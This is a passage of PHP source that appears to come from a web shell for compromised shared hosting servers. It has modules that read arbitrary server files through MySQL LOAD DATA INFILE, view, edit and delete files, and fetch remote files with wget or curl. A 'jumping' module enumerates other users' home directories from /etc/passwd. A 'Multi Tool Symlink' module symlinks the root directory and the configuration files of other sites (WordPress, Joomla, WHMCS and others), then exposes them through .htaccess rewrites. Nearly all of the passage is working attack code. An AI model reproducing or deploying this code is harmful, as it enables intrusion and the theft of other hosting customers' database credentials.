1548. while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1549. echo "</table>";
1550. mysql_free_result($result);
1551.  }
1552.  if ($sql_x == "getfile") {
1553. $tmpdb = $sql_login."_tmpdb";
1554. $select = mysql_select_db($tmpdb);
1555. if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1556. if ($select) {
1557.  $created = FALSE;
1558.  mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1559.  mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1560.  $result = mysql_query("SELECT * FROM tmp_file;");
1561.  if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1562.  else {
1563. for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
1564. $f = "";
1565. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
1566. if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1567. else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1568. mysql_free_result($result);
1569. mysql_query("DROP TABLE tmp_file;");
1570.  }
1571. }
1572. mysql_drop_db($tmpdb);
1573.  }
1574. }
1575.  }
1576. }
1577. echo '</td></tr>';
1578. if ($sql_sock) {
1579.   $affected = @mysql_affected_rows($sql_sock);
1580.   if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
1581.   echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
1582. }
1583. echo '</table></center>';
1584.   }
1585. echo '</form>';
1586. }
1587. }
1588. //*--------------------------------[ batas ]--------------------------------*//
1589.  
1590.  
1591. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ini_set('output_buffering',0);
1592.     @ob_start();
1593.     @eval("phpinfo();");
1594.     $buff = @ob_get_contents();
1595.     @ob_end_clean();   
1596.     $awal = strpos($buff,"<body>")+6;
1597.     $akhir = strpos($buff,"</body>");
1598.     echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
1599. }
1600. elseif(isset($_GET['view']) && ($_GET['view'] != "")){
1601.   if(is_file($_GET['view'])){
1602.     if(!isset($file)) $file = magicboom($_GET['view']);
1603.     if(!$win && $posix){
1604.         $name=@posix_getpwuid(@fileowner($folder));
1605.         $group=@posix_getgrgid(@filegroup($folder));
1606.         $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
1607.     }
1608.     else {
1609.         $owner = $user;
1610.     }
1611.     $filn = basename($file);
1612.     echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
1613.     <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
1614.     <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1615.         <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1616.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1617.         <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
1618.         <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
1619.     </form>
1620.     </td></tr>
1621.     <tr><td>Size</td><td>".ukuran($file)."</td></tr>
1622.     <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
1623.     <tr><td>Owner</td><td>".$owner."</td></tr>
1624.     <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
1625.     <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
1626.     <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
1627.     <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">Edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">Delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">Download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">GZip</a>)</td></tr>
1628.     <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">Text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">Code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">Image</a></td></tr>
1629.     </table>
1630.     ";
1631.     if(isset($_GET['type']) && ($_GET['type']=='image')){
1632.         echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>";
1633.     }
1634.     elseif(isset($_GET['type']) && ($_GET['type']=='code')){
1635.         echo "<div class=\"viewfile\">";
1636.         $file = wordwrap(@file_get_contents($file),"240","\n");
1637.         @highlight_string($file);
1638.         echo "</div>";
1639.     }
1640.     else {
1641.         echo "<div class=\"viewfile\">";
1642.         echo nl2br(htmlentities((@file_get_contents($file))));
1643.         echo "</div>";
1644.     }
1645.   }
1646.   elseif(is_dir($_GET['view'])){
1647.         echo showdir($pwd,$prompt);
1648.   }
1649.    
1650. }
1651. elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){@ini_set('output_buffering',0);
1652.  
1653.         if(isset($_POST['save'])){
1654.             $file = $_POST['saveas'];
1655.             $content = magicboom($_POST['content']);
1656.             if($filez = @fopen($file,"w")){
1657.                 $time = date("d-M-Y H:i",time());
1658.                 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
1659.                 else $msg = "failed to save";
1660.                 @fclose($filez);
1661.             }
1662.             else $msg = "permission denied";
1663.         }
1664.         if(!isset($file)) $file = $_GET['edit'];
1665.         if($filez = @fopen($file,"r")){
1666.             $content = "";
1667.             while(!feof($filez)){
1668.                 $content .= htmlentities(str_replace("''","'",fgets($filez)));
1669.             }
1670.             @fclose($filez);
1671.         }
1672.    
1673. ?>
1674. <form action="?y=<?=$pwd; ?>&amp;edit=<?=$file; ?>" method="post">
1675. <table class="cmdbox">
1676. <tr><td colspan="2">
1677. <textarea class="output" name="content">
1678. <?=$content; ?>
1679. </textarea>
1680. <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?=$file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1681. &nbsp;<?=$msg; ?></td></tr>
1682. </table>
1683. </form>
1684. <?php
1685. }
1686. elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
1687. {  
1688. ?>
1689. <form action="?y=<?=$pwd; ?>&amp;x=logout" method="post">
1690.  
1691. <?php
1692.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1693.     echo "<br /><br /><center>Byee !!!!!!</center>";
1694. }
1695.  
1696. //////////////////////////////////////////////////////////////////
1697. ///////////////////////////////////////////////////////////////////////////////
1698. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ @ini_set('output_buffering',0);
1699. echo "
1700. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1701.  
1702.     <tr>
1703.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1704.     <center><b><font size=5 style=italic color=#00ff00>Uploader</font></b></center></td></tr></table>
1705. ";
1706. if(isset($_POST['uploadcomp'])){
1707.     if(is_uploaded_file($_FILES['file']['tmp_name'])){
1708.         $path = magicboom($_POST['path']);
1709.         $fname = $_FILES['file']['name'];
1710.         $tmp_name = $_FILES['file']['tmp_name'];
1711.         $pindah = $path.$fname;
1712.         $stat = @move_uploaded_file($tmp_name,$pindah);    
1713.         if ($stat) {
1714.             $msg = "file uploaded to $pindah";
1715.         }
1716.         else $msg = "failed to upload $fname";
1717.     }
1718.     else $msg = "failed to upload $fname";
1719. }
1720. elseif(isset($_POST['uploadurl'])){@ini_set('output_buffering',0);
1721.     $pilihan = trim($_POST['pilihan']);
1722.     $wurl = trim($_POST['wurl']);
1723.     $path = magicboom($_POST['path']);
1724.     $namafile = download($pilihan,$wurl);
1725.     $pindah = $path.$namafile;
1726.     if(is_file($pindah)) {
1727.         $msg = "file uploaded to $pindah";
1728.     }
1729.     else $msg = "failed to upload $namafile";
1730.  
1731. }
1732. ?>
1733. <form action="?y=<?=$pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post"><table class="tabnet" style="width:320px;padding:0 1px;"><tr><th colspan="2"><b>Upload From Computer</b></th></tr><tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
1734. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?=$pwd; ?>" /></td></tr>
1735. </tr></table></form><table class="tabnet" style="width:320px;padding:0 1px;"><tr><th colspan="2"><b>Upload From URL</b></th></tr><tr><td colspan="2"><form method="post" style="margin:0;padding:0;" action="?y=<?=$pwd; ?>&amp;x=upload">
1736. <table><tr><td>Url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
1737. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?=$pwd; ?>" /></td></tr>
1738. <tr><td><select size="1" class="inputz" name="pilihan"><option value="wwget">Wget</option><option value="wlynx">Lynx</option><option value="wfread">Fread</option><option value="wfetch">Fetch</option><option value="wlinks">Links</option><option value="wget">Get</option><option value="wcurl">Curl</option>
1739. </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
1740. </tr></table><div style="text-align:center;margin:2px;"><?=$msg; ?></div>
1741. <?php }
1742. ////////////////////////////////////////////////////////////////////////////////////
1743. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @ini_set('output_buffering',0);
1744. echo "
1745. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1746.  
1747.     <tr>
1748.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1749.     <center><b><font size=5 style=italic color=#00ff00>Jumping</font></b></center></td></tr></table>
1750. ";
1751. ?>
1752.     <form action="?y=<?=$pwd; ?>&x=jumping" method="post">
1753.     <?php
1754.     echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
1755. ($sm = ini_get('safe_mode') == 0) ?
1756. $sm = 'off': die("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink>&nbsp;: &nbsp;&nbsp;Safe_mode = On </b></td></tr></table>");
1757.  
1758. set_time_limit(0);
1759. echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";  
1760. @$passwd = fopen('/etc/passwd','r');
1761. if (!$passwd) { die ("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink>&nbsp; : &nbsp;&nbsp; I Can't Read [ /etc/passwd ]</b></td></tr></table>
1762. <br><br><br><br><center><div class=\"info\"><b></div>
1763. <br><br><div class=\"jaya\"> &copy; ".date('Y',time())." Security Exploded </b></div></center>"); }
1764. $pub = array();
1765. $users = array();
1766. $conf = array();
1767. $i = 0;
1768.  
1769. while(!feof($passwd)){
1770. $str = fgets($passwd);
1771. if ($i > 100){ $pos = strpos($str,':');
1772. $username = substr($str,0,$pos);
1773. $dirz = '/home/'.$username.'/public_html/';
1774. if (($username != '')){ if (is_readable($dirz)){ array_push($users,$username);
1775. array_push($pub,$dirz); } } } $i++; }
1776. foreach ($users as $user){
1777. echo '
1778. <table><tr><td>[Found !]</td>
1779.     <td><a href="?y=/home/'.$user.'/public_html">/home/'.$user.'/public_html/</a><td></tr>'; }
1780.  echo "</table>";
1781.  }
1782.  
1783.  
1784. /////////////////////////////////////////////////////////////////////////////////////
1785. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
1786. {   @ini_set('output_buffering',0);
1787. echo "
1788. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1789.  
1790.     <tr>
1791.     <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1792.     <center><b><font size=5 style=italic color=#00ff00>Multi Tool Symlink</font></b></center></td></tr></table>
1793. ";
1794. ?>
1795. <form action="?y=<?=$pwd; ?>&amp;x=symlink" method="post">
1796. <form method='post'><center><table class='tabnet'><tr><th colspan='5'><b>Multi Tool Symlink</b></th></tr><tr><th><b>Manual Symlink</b></th><th><b>Auto Symlink</b></th><th><b>Domain Viewer</b></th></tr><tr><td><input class='inputzbut' type='submit'name='symlinkr' value="Manual Symlink" /></td><td><input class='inputzbut' type='submit'name='symlinks' value="Auto Symlink" /></td><td><input class='inputzbut' type='submit' name='domain' value="Domain Viewer" /></td></tr></table></center></form><br><hr><br><br>
1797. <?php
1798.  
1799. #==================[ Multi Tool Symlink ]==================#
1800.  
1801. if(isset($_POST['domain']))
1802. {
1803.    ?>
1804.     <form action="?y=<?=$pwd; ?>&x=dv" method="post">
1805.     <center><h2>[ Domain Viewer by ]<br>Notes: If Blank(No Domain) That Mean Not Work Use Domain Viewer, You Can Use Auto Symlink Server</center><br><br>
1806.     <?php
1807.     function openBaseDir()
1808. {
1809. $openBaseDir = ini_get("open_basedir");
1810. if (!$openBaseDir)
1811.     {
1812.         $openBaseDir = '<font color="green">OFF</font>';
1813.     }
1814.     else
1815.     {
1816.         $openBaseDir = '<font color="red">ON</font>';
1817.     }    
1818.     return $openBaseDir;
1819. }
1820.  
1821.  
1822. echo '
1823.    <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
1824.    <td height="100" align="left" class="td1">';
1825.     $pg = basename(__FILE__);
1826.     $safe_mode = @ini_get('safe_mode');
1827.     $dir = @getcwd();
1828.     ////////////////////////////////////////////////////
1829.     // LET'S PLAY ~
1830.     ##.htaccess
1831. @mkdir('explodedsym',0777);
1832. @symlink("/","explodedsym/root");
1833. $htaccss = "Options all
1834. DirectoryIndex Sux.html
1835. AddType text/plain .php
1836. AddHandler server-parsed .php
1837.  AddType text/plain .html
1838. AddHandler txt .html
1839. Require None
1840. Satisfy Any";
1841.  
1842. file_put_contents("explodedsym/.htaccess",$htaccss);
1843. $etc = file_get_contents("/etc/passwd");
1844. $etcz = explode("\n",$etc);
1845.  
1846.  
1847. ##Symlink to the ROOT :p
1848. foreach($etcz as $etz){
1849. $etcc = explode(":",$etz);
1850. error_reporting(0);
1851.  
1852. $current_dir = posix_getcwd();
1853. $dir = explode("/",$current_dir);
1854.  
1855. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1856. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1857. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1858. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1859. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"explodedsym/".$etcc[0].'-PhpBB.txt');
1860. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"explodedsym/".$etcc[0].'-vBulletin.txt');
1861. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1862. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1863. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1864. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1865. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"explodedsym/".$etcc[0].'-IPB.txt');
1866. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"explodedsym/".$etcc[0].'-MyBB.txt');
1867. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"explodedsym/".$etcc[0].'-SMF.txt');
1868. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"explodedsym/".$etcc[0].'-Drupal.txt');
1869. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"explodedsym/".$etcc[0].'-e107.txt');
1870. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"explodedsym/".$etcc[0].'-Seditio.txt');
1871. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"explodedsym/".$etcc[0].'-osCommerce.txt');
1872. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1873. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1874. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1875. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1876. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1877. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1878. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1879. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1880. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1881. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1882. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1883. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1884. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1885. }
1886. #############################
1887.     if(is_readable("/var/named")){
1888.     echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1889.     echo'<tr><td><center><b>SITE</b></center></td><td>
1890.     <center><b>USER</b></center></td>
1891.     <td></center><b>SYMLINK</b></center></td>';
1892.     $list = scandir("/var/named");
1893.     foreach($list as $domain){
1894.     if(strpos($domain,".db")){
1895.     $i += 1;
1896.     $domain = str_replace('.db','',$domain);
1897.     $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1898.  
1899.     echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1900.     <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1901.     <td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1902.         }
1903.     }
1904.     echo "<center>Total Domains Found: ".$i."</center><br />";
1905.     }else{
1906.     echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1907.  
1908. break;
1909.  
1910. ##################################
1911. error_reporting(0);
1912. $etc = file_get_contents("/etc/passwd");
1913. $etcz = explode("\n",$etc);
1914. if(is_readable("/etc/passwd")){
1915.  
1916. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1917. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1918.  
1919. $list = scandir("/var/named");
1920.  
1921. foreach($etcz as $etz){
1922. $etcc = explode(":",$etz);
1923.  
1924. foreach($list as $domain){
1925. if(strpos($domain,".db")){
1926. $domain = str_replace('.db','',$domain);
1927. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1928. if($owner['name'] == $etcc[0])
1929. {
1930. $i += 1;
1931. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1932. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1933. <td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1934. }}}}
1935. echo "<center>Total Domains Found: ".$i."</center><br />";}
1936.  
1937. break;
1938. ###############################
1939. if(is_readable("/etc/named.conf")){
1940. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1941. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1942. $named = file_get_contents("/etc/named.conf");
1943. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1944. foreach($domains[1] as $domain){
1945. $domain = trim($domain);
1946. $i += 1;
1947. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1948. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1949. }
1950. echo "<center>Total Domains Found: ".$i."</center><br />";
1951.  
1952. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1953.  
1954. break;
1955. ############################
1956. if(is_readable("/etc/valiases")){
1957. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1958. echo'<tr><td><center><b>SITE</b></center></td><td>
1959. <center><b>USER</b></center></td><td></center>
1960. <b>SYMLINK</b></center></td>';
1961. $list = scandir("/etc/valiases");
1962. foreach($list as $domain){
1963. $i += 1;
1964. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1965. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1966. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1967. <td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1968. }
1969. echo "<center>Total Domains Found: ".$i."</center><br />";
1970. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1971.  
1972. break;
1973. }
1974.  
1975. ##################################
1976.  
1977. #==================[ Multi Tool Symlink ]==================#
1978.  
1979. if(isset($_POST['symlinkr']))
1980. {
1981. @set_time_limit(0);
1982. @mkdir('sym',0777);
1983. error_reporting(0);
1984. $htaccess  = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1985. $op =@fopen ('sym/.htaccess','w');
1986. fwrite($op ,$htaccess);
1987. echo '<center><b>[ Manual Symlink ]</b><br><br>
1988. <form method="post"><table class="tabnet"><th colspan="5">Manual Symlink</th><tr>
1989. <td>File Path &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:</td><td><input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/></td></tr>
1990. <tr><td>Symlink Name :</td><td><input class="inputz" type="text" name="symfile" value="config.txt" size="60"/></td></tr>
1991. <tr><td></td><td><input class="inputzbut" type="submit" value="Symlink" name="symlink" /></td></tr></table></form></center>';
1992. $target = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink'];
1993. if ($symlink) {@symlink("$target","sym/$symfile");
1994. echo '<br><center><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a><center>';}}
1995.  
1996. #==================[ Multi Tool Symlink ]==================#
1997.  
1998. if(isset($_POST['symlinks']))
1999. {
2000. @set_time_limit(0);
2001. echo "<center><h1>[ Auto Symlink Server]</h1></center><br><center><div class=content>";
2002. $d0mains = @file("/etc/named.conf");
2003. ##httaces
2004. if($d0mains){
2005. @mkdir("explodedsyms",0777);
2006. @chdir("explodedsyms");
2007. @exe("ln -s / root");
2008. $file3 = 'Options all
2009. DirectoryIndex Sux.html
2010. AddType text/plain .php
2011. AddHandler server-parsed .php
2012. AddType text/plain .html
2013. AddHandler txt .html
2014. Require None
2015. Satisfy Any';
2016. $fp3 = fopen('.htaccess','w');
2017. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2018. echo "
2019. <table align=center border=1 style='width:60%;border-color:#333333;'>
2020. <tr>
2021. <td align=center><font size=3>S. No.</font></td>
2022. <td align=center><font size=3>Domains</font></td>
2023. <td align=center><font size=3>Users</font></td>
2024. <td align=center><font size=3>Symlink</font></td>
2025. </tr>";
2026. $dcount = 1;
2027.  
2028. foreach($d0mains as $d0main){
2029. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2030. flush();
2031. if(strlen(trim($domains[1][0])) > 2){
2032. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2033. echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
2034. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2035. <td>".$user['name']."</td>
2036. <td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2037. flush();
2038. $dcount++;}}}
2039. echo "</table>";
2040. }else{
2041. $TEST=@file('/etc/passwd');
2042. if ($TEST){
2043. @mkdir("explodedsyms",0777);
2044. @chdir("explodedsyms");
2045. exe("ln -s / root");
2046. $file3 = 'Options all
2047. DirectoryIndex Sux.html
2048. AddType text/plain .php
2049. AddHandler server-parsed .php
2050.  AddType text/plain .html
2051. AddHandler txt .html
2052. Require None
2053. Satisfy Any';
2054.  $fp3 = fopen('.htaccess','w');
2055.  $fw3 = fwrite($fp3,$file3);
2056.  @fclose($fp3);
2057.  echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
2058. <table align=center border=1><tr>
2059. <td align=center><font size=4>S. No.</font></td>
2060. <td align=center><font size=4>Users</font></td>
2061. <td align=center><font size=4>Symlink</font></td></tr>";
2062.  $dcount = 1;
2063.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2064.  while(!feof($file)){
2065.  $s = fgets($file);
2066.  $matches = array();
2067.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2068.  $matches = str_replace("home/","",$matches[1]);
2069.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2070.  continue;
2071.  echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2072. <td align=center><font class=txt>" . $matches . "</td>";
2073.  echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2074.  $dcount++;}fclose($file);
2075.  echo "</table>";}else{if($os != "Windows"){@mkdir("explodedsyms",0777);@chdir("explodedsyms");@exe("ln -s / root");$file3 = 'Options all
2076. DirectoryIndex Sux.html
2077. AddType text/plain .php
2078. AddHandler server-parsed .php
2079.  AddType text/plain .html
2080. AddHandler txt .html
2081. Require None
2082. Satisfy Any';
2083.  $fp3 = fopen('.htaccess','w');
2084.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2085.  echo "<center>
2086. <table align=center border=1><tr>
2087. <td align=center><font size=4>Id</font></td>
2088. <td align=center><font size=4>Users</font></td>
2089. <td align=center><font size=4>Symlink</font></td></tr>";
2090.  $temp = "";$val1 = 0;$val2 = 1000;
2091.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2092.  if ($uid)$temp .= join(':',$uid)."\n";}
2093.  echo '<br/>';$temp = trim($temp);$file5 =
2094.  fopen("test.txt","w");
2095.  fputs($file5,$temp);
2096.  fclose($file5);$dcount = 1;$file =
2097.  fopen("test.txt", "r") or exit("Unable to open file!");
2098.  while(!feof($file)){$s = fgets($file);$matches = array();
2099.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2100.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2101.  continue;
2102.  echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2103. <td align=center><font class=txt>" . $matches . "</td>";
